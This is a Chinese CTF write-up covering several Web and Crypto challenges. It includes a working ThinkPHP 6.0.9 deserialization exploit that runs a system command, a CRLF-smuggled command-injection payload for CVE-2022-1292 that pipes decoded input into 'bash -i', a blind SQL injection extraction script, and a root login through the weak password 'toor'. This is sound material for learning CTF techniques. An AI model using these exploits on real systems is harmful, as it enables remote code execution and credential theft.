出题人不会出可以不出

Web手变成Crypto手,密码学大胜利

Web

ezpop

扫目录发现源码www.zip,发现反序列化触发点

Thinkphp6.0.9反序列化复现及整合 - 先知社区 (aliyun.com)

网上的exp

<?php

namespace think {

    use think\route\Url;

    // Local stand-in for the framework's think\Model, declared only so that
    // serialize() emits the same property names and visibilities as the real
    // class. The values are those used by the linked ThinkPHP 6.0.9 article;
    // the framework code that consumes them on unserialize() is not shown here.
    abstract class Model
    {
        private $lazySave;
        private $exists;
        protected $withEvent;
        protected $table;
        private $data;
        private $force;

        public function __construct()
        {
            $this->lazySave = true;
            $this->withEvent = false;
            $this->exists = true;
            // Not a table name: a think\route\Url object is stored here.
            $this->table = new Url();
            $this->force = true;
            $this->data = ["1"];
        }
    }
}

namespace think\model {

    use think\Model;

    // Concrete subclass so the abstract Model above can be instantiated.
    class Pivot extends Model
    {
        function __construct()
        {
            parent::__construct();
        }
    }

    // Build the object graph and print it URL-encoded for the
    // deserialization entry point found in www.zip. The root cause on the
    // defending side is that unserialize() is reached with user-controlled
    // input; the classes above only shape what that call produces.
    $b = new Pivot();
    echo urlencode(serialize($b));
}

namespace think\route {

    use think\Middleware;
    use think\Validate;

    // Stand-in for think\route\Url. $domain carries a string containing a PHP
    // tag and $route points at a Validate whose 'getDomainBind' entry is a
    // callable (see think\Validate below). How the framework's own Url class
    // consumes these properties is not on this page — see the linked article.
    class Url
    {
        protected $url;
        protected $domain;
        protected $app;
        protected $route;

        public function __construct()
        {
            $this->url = 'a:';
            $this->domain = "<?php system('cat /flag.txt');?>";
            $this->app = new Middleware();
            $this->route = new Validate();
        }
    }
}

namespace think {

    use think\view\driver\Php;

    // Stand-in for think\Validate: only the dynamic $type map matters here.
    // Its 'getDomainBind' entry is a [object, method] callable array naming
    // think\view\driver\Php::display — the stub Php class below has no such
    // method, so the real one is expected to come from the framework.
    class Validate
    {
        public function __construct()
        {
            $this->type['getDomainBind'] = [new Php(), 'display'];
        }
    }

    // Stand-in for think\Middleware with a single dynamic $request property.
    class Middleware
    {
        public function __construct()
        {
            $this->request = "2333";
        }
    }
}

namespace think\view\driver {

    // Empty stand-in for think\view\driver\Php: only the class name is needed
    // in the serialized output. The display() method referenced from
    // think\Validate is not declared here and presumably lives in the framework.
    class Php
    {
        public function __construct()
        {
        }
    }
}

image-20220529203229115

online_crt

下载源码,发现openssl,最近有个命令注入的洞CVE-2022-1292

注入点在这

image-20220529163518331

文件名可以从go写的这个重命名的地方修改

image-20220529163550057

要先绕过这两个判断url和host的地方,可以用Python的Proxy路由进行crlf

image-20220529163632506

整体流程如下:

先POST getcrt进行获取crt证书

image-20220529163900483

随后利用crlf绕过判断,进行修改文件名

request.form.get是从post表单中获取值,同时又限制了只能发送get,因此可以构建以下数据包绕过

image-20220529163932986

c.Request.URL.RawPath指的是解码前的URL

image-20220529195553069

payload

%2F%2561dmin%2Frename%3Foldname%3D7294271b%2D5c7f%2D44a1%2D8eb0%2D6999c1dba0f7%2Ecrt%26newname%3D7294271b%2D5c7f%2D44a1%2D8eb0%2D6999c1dba0f7%2Ecrt%2522%253Becho%2520Payload%253D%257Cbase64%2520%252Dd%257Cbash%2520%252Di%253Becho%2522%20HTTP%2F1%2E1%0AHost%3A%20admin%0AUser%2DAgent%3A%20admin%0AAccept%2DEncoding%3A%20gzip%2C%20deflate%0AAccept%2DLanguage%3A%20zh%2DCN%2Czh%3Bq%3D0%2E9%0AConnection%3A%20close%0A%0A%0A

最后访问createlink触发

image-20220529164005068

image-20220529164015415

Ezpentest

https://ctfking.com/2022/032432393.html

出题人这是拿waf来让我们猜,恶心人吗这是,放了两次hint,直到黑灯了才有解

过滤了~,因此文章里的payload需要改一下:把~0+1+''改成!0+18446744073709551615+1+'',同样可以利用整数溢出进行报错注入

直接拿文章里的脚本

import requests
url='http://xxx/login.php'
# Route every request through a local intercepting proxy so it can be inspected.
proxies = {
    "http":"http://127.0.0.1:8080/"
}
flag=''
# Recovers the `password` column one character per round, at most 49 rounds.
# NOTE(review): a round with no match leaves `flag` unchanged and simply
# retries the same position on the next round.
for i in range(1,50):
    # NOTE: `ascii` shadows the builtin of the same name.
    for ascii in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789^!?$':
        temp=ascii
        # The four trailing specials are LIKE/regex metacharacters; the
        # substring test is valid only because each candidate is a single character.
        if(temp in '^!?$'):
            # Six source backslashes -> three literal backslashes before the character.
            temp="\\\\\\"+temp
        payload={
            'password':'xxx',
            # Same probe aimed at the `username` column, kept for reference.
            # "username":f"'||case`username`like'{flag+temp}%'COLLATE'utf8mb4_bin'when'1'then!0+18446744073709551615+1+''else'0'end||'",
            "username":f"'||case`password`like'{flag+temp}%'COLLATE'utf8mb4_bin'when'1'then!0+18446744073709551615+1+''else'0'end||'",
        }
        response=requests.post(url=url, data=payload,proxies=proxies)
        # HTTP 500 is the oracle: the CASE branch with the integer overflow
        # (the error-based trick described above) only runs on a LIKE prefix match.
        if response.status_code==500:
            flag+=temp
            print(flag)
            break
        # print(ascii)

密码:(挺怪异一段,忘了存了)

image-20220531195830075

账户不是admin,注一下发现是这么个玩意:

image-20220531195917659

然而还是登录不上,不知道为啥;最后时间不够,也没去找flag是不是在别的表里,绝了

Crypto

签到电台

拿提示

image-20220529113452440

从题中拿到密码本,根据提示写脚本

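def add_digits_mod10(key_groups, cipher_groups):
    """Combine two sequences of digit strings position-wise, modulo 10.

    Each group in ``key_groups`` is paired with the group at the same index
    in ``cipher_groups``; corresponding digits are summed and only the last
    decimal digit is kept.

    Args:
        key_groups: Digit strings from the code book, e.g. ``["2912", "3414"]``.
        cipher_groups: Digit strings of the same shape from the challenge.

    Returns:
        The concatenated result digits as a single string.

    Raises:
        ValueError: If the group counts differ or a pair of groups differs in
            length (the index-based original raised IndexError or silently
            used the key group's length).
    """
    if len(key_groups) != len(cipher_groups):
        raise ValueError("group count mismatch")
    digits = []
    for key_group, cipher_group in zip(key_groups, cipher_groups):
        if len(key_group) != len(cipher_group):
            raise ValueError("group length mismatch")
        digits.extend(
            str((int(k) + int(c)) % 10) for k, c in zip(key_group, cipher_group)
        )
    return "".join(digits)


# Code book from the challenge hint, and the received digit groups.
key="2912 3414 5162 6502 4914 3233 4313".split(" ")
flag="1732 2514 1344 0356 0451 6671 0055".split(" ")
res = add_digits_mod10(key, flag)
print(res)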

image-20220529113535253

基于挑战码的双向认证1、2

非预期,root目录权限没配置,可以直接读取flag

image-20220529114649647

基于挑战码的双向认证3

依旧是非预期,root的密码是弱口令toor,直接su root

image-20220529200134210

ISO9798

先跑验证码

import hashlib
import itertools
import string


def sha256(s):
    """Return the hex SHA-256 digest of ``str(s)`` encoded as UTF-8."""
    encoded = str(s).encode('utf-8')
    return hashlib.sha256(encoded).hexdigest()

# Challenge values copied from the service: the expected digest and the
# known 16-character tail of the preimage.
total_sha256 = 'd0320fe0ec98bde37c5ed7f87d7d2624cccc0d87c247e91ca44f00874f06f2c8'
know = 'VN6HjfueM7Uj8q5E'

# Alphabet for the unknown prefix: 0-9, a-z, A-Z (62 symbols).
dic = "".join((string.digits, string.ascii_letters))

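def findsha256(know, total_sha256, alphabet=None, length=4):
    """Brute-force the proof-of-work prefix for a challenge string.

    Tries every ``length``-character string over ``alphabet`` in lexicographic
    order (the same order as the original four nested loops) and looks for the
    prefix ``p`` with ``sha256(p + know) == total_sha256``.

    Args:
        know: Known suffix supplied by the challenge.
        total_sha256: Expected hex digest of ``prefix + know``.
        alphabet: Characters tried per position; defaults to digits plus
            ASCII letters, the same set as the module-level ``dic``.
        length: Number of unknown leading characters.

    Returns:
        The matching prefix, or ``None`` when the space is exhausted. On a
        hit ``success:<prefix>`` is printed, as before; the per-candidate
        ``print`` and the ``exit()`` inside the loop are gone, since they made
        the search far slower and prevented reuse from other code.
    """
    if alphabet is None:
        alphabet = string.digits + string.ascii_letters
    target = total_sha256.lower()  # hexdigest() is lowercase
    suffix = str(know).encode("utf-8")
    for combo in itertools.product(alphabet, repeat=length):
        candidate = "".join(combo)
        digest = hashlib.sha256(candidate.encode("utf-8") + suffix).hexdigest()
        if digest == target:
            print("success:" + candidate)
            return candidate
    return None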

# Run the full 62**4 (about 14.8 million candidates) search for the challenge above.
findsha256(know,total_sha256)

第二步是输128bit的随机数

随便输满位数,进入第三步

第三步返回了96位的字符串,

观察加密方式,有三项内容,于是尝试三等分,按照题目要求将第二部分和第一部分拼接

image-20220529202739387